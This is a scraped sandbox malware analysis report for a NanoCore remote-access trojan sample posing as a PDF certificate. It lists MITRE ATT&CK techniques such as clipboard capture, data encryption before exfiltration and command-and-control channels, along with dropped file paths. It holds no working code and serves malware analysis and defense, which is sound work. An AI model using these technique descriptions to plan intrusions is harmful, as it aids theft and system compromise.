Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Certificate#U00b7pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: NanoCore

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

AV Detection

E-Banking Fraud

System Summary

Persistence and Installation Behavior

Stealing of Sensitive Information

Remote Access Functionality

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\caspol.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\Kommandosyntaksen.Knk

C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\japanese.txt

C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\ku.txt

C:\Users\user\AppData\Local\Skamflelsens\fameless\Pregenerous224\Ateistiskes.Non

Windows Analysis Report
Certificate#U00b7pdf.exe

Function 0040336C Relevance: 86.2, APIs: 33, Strings: 16, Instructions: 410
stringfilecomCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre